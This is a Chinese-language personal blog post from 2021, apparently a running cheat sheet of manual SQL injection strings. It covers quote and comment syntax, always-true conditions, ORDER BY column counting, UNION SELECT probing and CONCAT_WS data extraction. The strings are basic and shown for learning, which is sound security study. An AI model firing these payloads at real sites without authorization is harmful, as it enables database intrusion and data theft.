<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>SQL手工注入语句大全 | THE SECLUDED</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="SQL手工注入语句大全" />
<meta name="author" content="Blume" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="说明 此文章持续更新，我会把学到的各种sql注入语句发布在这里" />
<meta property="og:description" content="说明 此文章持续更新，我会把学到的各种sql注入语句发布在这里" />
<meta property="og:site_name" content="THE SECLUDED" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-02-02T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="SQL手工注入语句大全" />
<script type="application/ld+json">
{"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"/2021-02-02/sql-injection.html"},"url":"/2021-02-02/sql-injection.html","author":{"@type":"Person","name":"Blume"},"headline":"SQL手工注入语句大全","dateModified":"2021-02-02T00:00:00+08:00","datePublished":"2021-02-02T00:00:00+08:00","description":"说明 此文章持续更新，我会把学到的各种sql注入语句发布在这里","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <!-- CSS -->
  <link rel="stylesheet" href="/assets/main.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Libre+Baskerville:400,400i,700">

  <!-- Favicon -->
  <link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon-16x16.png">
  <link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png">

  <!-- RSS -->
  <link type="application/atom+xml" rel="alternate" href="/feed.xml" title="THE SECLUDED" />

  <!-- Google Analytics-->
  
</head>


  <body>

    <nav class="nav">
  <div class="nav-container">
    <a href="/">
      <h2 class="nav-title">THE SECLUDED</h2>
    </a>
    <ul>
      <li><a href="/">文章</a></li>
      <li><a href="/tags">标签</a></li>
      <li><a href="/about">个人介绍</a></li>
    </ul>
  </div>
</nav>


    <main>
      <div class="post">
  <div class="post-info">
    <span>编写:</span>
    
        Blume
    

    
      <br>
      <span>on&nbsp;</span><time datetime="2021-02-02 00:00:00 +0800">February 02, 2021</time>
    
  </div>

  <h1 class="post-title">SQL手工注入语句大全</h1>
  <div class="post-line"></div>

  <h2 id="说明">说明</h2>
<p>此文章持续更新，我会把学到的各种sql注入语句发布在这里</p>

<h2 id="语句控制">语句控制:</h2>
<ul>
  <li>
    <p>如果参数是字符串，用 <code class="language-plaintext highlighter-rouge">'</code>。如果参数是数字，用 <code class="language-plaintext highlighter-rouge">;</code></p>
  </li>
  <li>
    <p>要”注释”掉后面的内容，可以用 <strong><code class="language-plaintext highlighter-rouge">-- </code></strong> (有空格!!!)</p>
  </li>
</ul>

<h2 id="查询语句大全">查询语句大全</h2>
<ul>
  <li>
    <p>使条件为真: <code class="language-plaintext highlighter-rouge">' or 'a' = 'a</code></p>
  </li>
  <li>
    <p>使条件为假: <code class="language-plaintext highlighter-rouge">' and '1' = '0</code></p>
  </li>
  <li>使用order by判断服务器SQL语句到底查询了多少个参数”: <code class="language-plaintext highlighter-rouge">' order by X -- </code>
    <ul>
      <li>X 可以是任何一个数字，从比较大的数字开始，一直减半，直到语句成功为止，这时 X 可能就是参数的数量</li>
      <li>为了获得更精确的结果，建议在原来的基础上执行多几次加减法</li>
    </ul>
  </li>
  <li>确定参数位置: <code class="language-plaintext highlighter-rouge">' union select X,Y,Z...... -- </code>
    <ul>
      <li>XYZ看参数数量决定，观察输出以确定参数的位置</li>
    </ul>
  </li>
  <li>输出多条信息(拼接法): <code class="language-plaintext highlighter-rouge">' union select CONCAT_WS(CHAR(32, 58, 32), X, Y, Z), Y, Z... -- </code>
    <ul>
      <li>XYZ看参数数量决定</li>
      <li>CHAR(32, 58, 32) 指 “ : “</li>
    </ul>
  </li>
</ul>

</div>



<div class="pagination">
  
  
    <a href="/2021-02-02/miyun-recommend.html" class="right arrow">&#8594;</a>
  

  <a href="#" class="top">返回顶部</a>
</div>
    </main>

    <footer>
  <span>
    &copy; <time datetime="2021-02-02 19:49:57 +0800">2021</time> Blume. The Secluded
  </span>
</footer>

  </body>
</html>
